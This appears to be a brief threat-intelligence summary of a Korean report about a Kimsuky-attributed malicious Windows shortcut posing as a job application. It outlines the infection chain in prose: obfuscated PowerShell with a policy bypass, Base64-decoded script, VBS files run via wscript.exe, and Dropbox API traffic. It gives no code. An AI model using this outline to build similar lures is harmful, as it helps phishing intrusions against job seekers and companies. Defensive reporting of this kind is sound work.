The Korean source attributes a malicious Windows shortcut disguised as an employment application document to Kimsuky. The LNK launches obfuscated PowerShell with execution-policy bypass, decodes embedded Base64 script content, searches for matching shortcut files, and extracts additional data from the LNK. Execution creates VBS and temporary files under ProgramData, runs them with wscript.exe, and uses Dropbox API upload and download endpoints for network activity. The report provides hashes for the lure and notes antivirus detections for the LNK dropper.